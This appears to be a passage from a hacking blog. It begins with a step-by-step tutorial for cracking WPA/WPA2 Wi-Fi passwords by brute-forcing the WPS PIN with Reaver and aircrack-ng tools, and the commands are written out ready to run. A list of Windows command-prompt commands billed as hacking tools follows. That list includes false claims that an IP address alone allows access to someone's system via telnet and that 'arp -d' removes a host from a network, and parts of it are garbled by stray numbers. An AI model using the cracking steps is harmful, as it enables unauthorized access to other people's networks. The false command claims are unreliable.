Note: To test if Reaver have been successfully installed, Open a Terminal and Type ‘reaver’ and hit enter, it should list all Reaver’s sub commands.

Step 2 ( Hacking WPA/WPA2 Wireless)

After installing reaver 1.4, it’s time to proceed to the main part which is hacking wireless passwords that uses WPA/WPA2 Encryption.
Requirements:
Install aircrack-ng by typing

sudo apt-get install aircrack-ng

Airodump-ng / Airmon-ng commands

Reaver 1.4 (Install in Step 1)

1) We need to have the wireless BSSID (Mac address) so we use airodump-ng. Open a terminal and Type :

airmon-ng start wlan0

Type

airodump-ng mon0

It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:28:32:49:55 )
2) Starting the attack type:

 reaver -i mon0 -b 00:11:28:32:49:55

Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.

Note: You can use walsh -i mon0 to scan for vulnerable Access Points.

Screenshot:
learn2crack.com
For better idea follow the video on the top of this page. enjoy

HACK WITH COMMAND PROMPT:ALL COMMAND PROMPT COMMANDS

Command Prompt is the heart of windows and with a technical point of view, command prompt is the only good thing in windows for a techie. Command Prompt gives you a feel of how things work in the back end of windows. For example, if we copy and paste using usual right click feature we don’t get to know what is happening behind the buttons to make copy and paste possible. But if we copy and paste using command prompt, we get to know how things are done.

BY:TEKUSHISHIKIMIME

When someone starts learning about computers and hacking, the priority should be to gain a firm hold on command prompt as command is very powerful and allows you to do a lot of stuff. Now I’ll talk about some of the commands of command prompt which a hacker should surely know. Before trying these commands, make sure you are running command prompt as the administrator.(right click on cmd > run as administrator)

  1. ipconfig: ifconfig is a very basic command which tells theIP(Internet Protocol) address of your  machine if you are connected to the internet. Other information  such as default gateway, subnet mask etc. are also displayed. This command is similar to ifconfig command in linux systems.
    Syntax:ipconfig.    2

 

  1. Ping:Ping command is used to check if a host is up or not. It sends 32 bytes of data to the host whom we want to check, if the reply comes from the host, it means that the host is up.
    Syntax: ping xxx.xxx.xxx.xxx (where xxx.xxx.xxx.xxx is the ip you want to check).

Ping command can also be used to check the IP Address of website by pinging them and you can use that IP Address to open that site too by putting it on the URL box.3
Syntax: ping tekushishikimime.blogspot.com

  1. Telnet:Telnet is a command line tool by microsoftwhich is used to establish connection remote servers. Telnet has been used widely for hacking where attackers used to establish remote connection to victim pc when the ports of the victim system where open. By default telnet operates on port 23. Telnet is not available in the windows system, you have to enable it manually. To enable telnet on windows follow the following steps:
  • Open up control panel and select system and security.
  • Select “programs” option from left side.
  • In program and features section click on “turn windows features on or off”.
  • A menu will open up and from there select check the option “telnet click” and “telnet server”.

If you know the ip of a person, you can gain access to his system using telnet. To open telnet window, type “telnet”(without quotes) in the command prompt. Here is an example of a simple telnet command used to open a connection.5

Syntax: o xxx.xxx.xxx 171 (o: means “open”, 23: default port for telnet)

6

Various other commands of telnet can also be used once the connection is established to the client machine. Simple type “help” in the telnet windows to see other options.

  1. ARP:“arp” stands for Address Resolution Protocol and this command is used to monitor the network stats and connections. Address Resolution Protocol means that it link ip address to physical address or mac address. ARP command comes handy when you are in a school, college, office network. This command is available by simply typing “arp” in command prompt.

Syntax: arp -a (This command displays a list of current ARP entries)7

Syntax: arp -d xxx.xxx.xxx.xxx(This command deletes a host specified by you from network, here xxx.xxx.xxx.xxx is the specified host).

  1. nslookup: This is a very useful command which you name of your domain and it’s ip address.

Syntax: nslookup

You can also find information about an ip in using the same server in your netowrk by just simply typing name of the ip in the nslookup window.

8

  1. Netstat:Netstat command gives you information about your internet connections. Netstat command gives a list of active connections. This command is very useful and if someone has RAT Ed your pc, then you can detect it by this command as it would display the connection of RAT being made with it’s host.

Syntax: netstat

9

Here Protocol used by the connection, foreign address and the state of the connection are displayed.

If you suspect some connection then you can always see what is causing that connection by typing the following command : netstat -b (this would display the executable involved in creating that connection)

The pointed .exe’s are the open which are creating a connection.

12

If you want to know statistics of each protocol, then your can try this command: netstat -s

Other netstat commands can be seen by typing “netstat help” (exclude commas).

With this, I conclude this article. I hope this helps people new to command prompt and renews the memory of ones already using it 🙂